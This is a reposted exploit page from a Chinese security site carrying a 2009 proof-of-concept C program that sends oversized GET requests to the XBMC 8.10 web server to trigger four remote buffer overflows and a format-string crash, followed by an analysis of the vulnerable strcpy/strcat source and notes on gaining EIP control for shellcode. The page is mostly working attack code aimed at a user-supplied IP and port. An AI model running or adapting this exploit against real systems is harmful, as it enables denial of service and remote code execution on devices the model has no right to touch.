首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
XBMC 8.10 (GET Requests) Multiple Remote Buffer Overflow PoC
来源:www.vfcocus.net 作者:n00b 发布时间:2009-04-02  
/*
XBMC multiple remote buffer overflow vulnerabilities.

XBMC is an award winning media center application for
Linux, Mac OS X, Windows and XBox. The ultimate hub
for all your media, XBMC is easy to use, looks slick,
and has a large helpful community.XBMC has won many
awards.

Affected version: XBMC 8.10 Atlantis
Tested on: Windows xpsp3 and linux unbuntu 8.10
Venders web site : http://xbmc.org/
Release date:April the 1st 2009

Credits go to n00b for finding the buffer overflow
and writing simple yet effective poc code.
Shout's to every one that knows me and have helped over
the years.

Please if u do wish to write a exploit for the buffer
overflow please give credits.
also you will have to filter the bad chars from
shellcode if you do wish to write exploit for the
voulnrabilitys in this advisory.

----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!

You can call by my blog to leave comments and feed back
and ask any questions you would like.Should be up
and runing in a few days.

[--]
http://n00b-n00b.blogspot.com/
[--]

This poc code was writen on linux using gcc-4.* to compile.
*/

#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>

/*Just enough recived buffer to allow for the server banner!!*/

#define BUFFSIZE 32


void error(char *mess)
{
    perror(mess);
    exit(1);
}

int main(int argc, char *argv[])
{
    int sock;
    int input;
    struct sockaddr_in http_client;
    char buffer[BUFFSIZE];

    /*You may need to add more buffer on linux versions!!
      on windows its <1010> bytes to own eip next 4 bytes
      are loaded into the $esp register.*/
    char buffer1[1500];

    unsigned int http_len;
    int received = 0;

    /* If there is more than 2 arguments passed print usage!!*/
    if (argc != 3)
    {
        fprintf(stderr,"USAGE: Server_ip port\n");
        exit(1);
    }

    /* Create socket */
    if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    {
        error("Cant create socket");
    }


    /* Construct sockaddr */
    memset(&http_client, 0, sizeof(http_client));
    http_client.sin_family = AF_INET;
    http_client.sin_addr.s_addr = inet_addr(argv[1]);
    http_client.sin_port = htons(atoi(argv[2]));

    /* Establish connection */
    if (connect(sock,
                (struct sockaddr *) &http_client,
                sizeof(http_client)) < 0)
    {
        error("Failed to connect with remote host");
    }

    /*We need to Construct all the voulnrable request togeather*/
    memset( buffer1, 0x41, sizeof(buffer1) - 1 );

    printf( "----------------------------------------------------------------\n" );
    printf( "XBMC remote buffer overflow poc code by  n00b !!\n" );
    printf( "----------------------------------------------------------------\n" );
    printf( "[1]. Get request buffer overflow poc !!\n" );
    printf( "[2]. Get /xbmcHttp?command=takescreenshot buffer overflow !!\n" );
    printf( "[3]. Get /xbmcHttp?command=GetTagFromFilename buffer overflow !!\n" );
    printf( "[4]. queryvideodatabase possible format string poc !!\n" );
    printf( "----------------------------------------------------------------\n" );
    printf( "----------------------------------------------------------------\n" );
    printf( "[5]. Cancel and quit application !!\n" );
    printf( "----------------------\n" );
    printf( "Pick your http request: " );
    scanf( "%d", &input );
    switch ( input )
    {
    case 1:
        memcpy ( buffer1, "GET /", 5);
        memcpy ( buffer1 +(sizeof(buffer1) - 1) - 21, ".asp HTTP/1.1\r\n\r\n", 21);
        break;
    case 2:
        memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=takescreenshot(", 46);
        memcpy ( buffer1 +(sizeof(buffer1) - 1) - 41, ".jpg;false;0;300;200;90) HTTP/1.1\r\n\r\n", 41);
        break;
    case 3:
        memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=GetTagFromFilename(C:/", 53);
        memcpy ( buffer1 +(sizeof(buffer1) - 1) - 23, ".mp3) HTTP/1.1\r\n\r\n", 23);
        break;
    case 4:
        memcpy ( buffer1, "GET /xbmcCmds/xbmcHttp?command=queryvideodatabase(%s%s%s%s) HTTP/1.1\r\n\r\n", 76);
        break;
    case 5:
        exit(0);
        break;
    }


    /* Send our get request to the server*/
    http_len = strlen(buffer1);
    if (send(sock, buffer1, http_len, 0) != http_len)
    {
        error("No byte's where sent to remote host check Get request !!");
    }


    /* Receive the current state of the server*/
    fprintf(stdout, "Received: ");
    while (received < http_len)
    {
        int bytes = 0;
        if ((bytes = recv(sock, buffer, BUFFSIZE-1, 0)) < 1)
        {
            error("Was the banner received?? if no banner exploit was successfull!!");
        }
        received += bytes;
        buffer[bytes] = '\0';
        fprintf(stdout, buffer);
    }

    fprintf(stdout, "\n");
    close(sock);
    exit(0);
}


/*
A basic run down of the bugs found with a basic discription.!!


(1)..(Get request WebsHomePageHandler buffer overflow)..

I was able to track down most of the vulnerable code.All this info
was collected on a window's system.

The first buffer overflow i found in the xbmc application all is
required was for me to make a simple get request by adding 1033 bytes
of user supplied data to the request.We are now able to gain control of the
$eip register and the next four bytes on the stack is where our $esp register
is pointing.


--snip--


Source of WebsHomePageHandler..\XBMC\xbmc\lib\libGoAhead\WebServer.cpp




        Home page handler

static int websHomePageHandler(webs_t wp, char_t *urlPrefix, char_t *webDir,
int arg, char_t *url, char_t *path, char_t *query)
{

       If the empty or "/" URL is invoked, redirect default URLs to the home page

        char dir[1024];
        char files[][20] = {
                        {"index.html"},
                        {"index.htm"},
                        {"home.htm"},
                        {"home.html"},
                        {"default.asp"},
                        {"home.asp"},
                        {'\0' }
                    };




        strcpy(dir, websGetDefaultDir());
        strcat(dir, path);
        for(u_int pos = 0; pos < strlen(dir); pos++)
if (dir[pos] == '/') dir[pos] = '\\';

DWORD attributes = GetFileAttributes(dir);
if (FILE_ATTRIBUTE_DIRECTORY == attributes)
{
int i = 0;
char buf[1024];
while (files[i][0])
{
strcpy(buf, dir);
if (buf[strlen(buf)-1] != '\\') strcat(buf, "\\");
strcat(buf, files[i]);

if (!access(buf, 0))
{
strcpy(buf, path);
if (path[strlen(path)-1] != '/') strcat(buf, "/");
strcat(buf, files[i]);
websRedirect(wp, buf);
return 1;
}
i++;
}


--snip--


the next set of voulnrabilitys are exploited through
the "Web Server HTTP API".
more information can be read at the following link.
I wrote a simple fuzzer and fuzzed all the commands that
where passed through the http requests.


http://xbmc.org/wiki/?title=WebServerHTTP-API


(2)..(takescreenshot remote buffer overflow)..

please visit the above link for more information
on specific command's.This is also a classic buffer
overflow where we can add a long file name to the
takescreenshot command and pass it to the API.
once again we can over flow the static allocated
buffer on the stack and let us own the application
flow.Thus letting us execute our own supplied data.
Also as a side note to this buffer overflow
there are different registers over wrote.

...\XBMC\xbmc\cores\DllLoader\exports\emu_msvcrt.cpp

--snip--


int dll_open(const char* szFileName, int iMode)
  {
    char str[XBMC_MAX_PATH];

    // move to CFile classes
    if (strncmp(szFileName, "\\Device\\Cdrom0", 14) == 0)
    {
      // replace "\\Device\\Cdrom0" with "D:"
      strcpy(str, "D:");
      strcat(str, szFileName + 14);
    }
    else strcpy(str, szFileName);

    CFile* pFile = new CFile();
    bool bBinary = false;
    if (iMode & O_BINARY)
      bBinary = true;
    bool bWrite = false;
    if ((iMode & O_RDWR) || (iMode & O_WRONLY))
      bWrite = true;
    bool bOverwrite=false;
    if ((iMode & _O_TRUNC) || (iMode & O_CREAT))
      bOverwrite = true;
    // currently always overwrites
    bool bResult;
    if (bWrite)
      bResult = pFile->OpenForWrite(_P(str), bBinary, bOverwrite);
    else
      bResult = pFile->Open(_P(str), bBinary);
    if (bResult)
    {
      EmuFileObject* object = g_emuFileWrapper.RegisterFileObject(pFile);
      if (object == NULL)
      {
        VERIFY(0);
        pFile->Close();
        delete pFile;
        return -1;
      }
      return g_emuFileWrapper.GetDescriptorByStream(&object->file_emu);
    }
    delete pFile;
    return -1;
  }

--snip--

We also know that szFileName is defind in a headerfile with
1024 bytes staticaly allocated.So if we passs more the 1024 byte's we can cause
stack corruption and over write the $eip also give's us a choice of registers
we can use for our shell code.



(3)..(GetTagFromFilename remote buffer overflow)..

The buffer over flow is when parsing a id3 tag
the difference is the registers that are over wrote
at the time of access violation are as follow's.Im not
going to list all the source for all the exceptions.
This poc is big enough already with out adding more
information and its simple to set up XBMC and compile
on your own machine..



(4)..(Sqlite queryvideodatabase)..

Just results in denial of service no more information available
maybe ill look more into sqllite3 in the future.

[--]
/xbmcCmds/xbmcHttp?command=queryvideodatabase(%s%s%s%s)
[--]

All the above vulnerability's where tested on linux and windows
On linux unbuntu 8.10 using strace to debug.And on windows
i used visual c++ express 2008.This poc code is just a simple
poc code to show the vulnerability's i found within the XBMC
application.

it started off as closed source analysis.Although
the application was tested there are still a lot of other
possibility for exploitation.Even the login for the web server
could be vulnerable to a buffer overflow.

Also worth a mention is i could take controll over the XBMC
web server and there would be no error messages or any thing to
sugest that the server had been took offline but it carrys on as
normal the rest of xbmc stays the same with out any changes.
It looks like it just terminates the thread and leaving the
rest of the application intact and continues to run
like normal.


*/

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Oracle WebLogic IIS connector
·XBMC 8.10 (Get Request) Remote
·DeepBurner 1.9.0.228 Stack Buf
·XBMC 8.10 (Get Request) Remote
·The Cisco ASA5520 Web VPN suff
·XBMC 8.10 (takescreenshot) Rem
·PrecisionID Datamatrix ActiveX
·XBMC 8.10 (get tag from file n
·VirtueMart <= 1.1.2 Multiple R
·QtWeb Internet Browser version
·VirtueMart <= 1.1.2 Remote SQL
·Amaya version 11.1 suffers fro
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved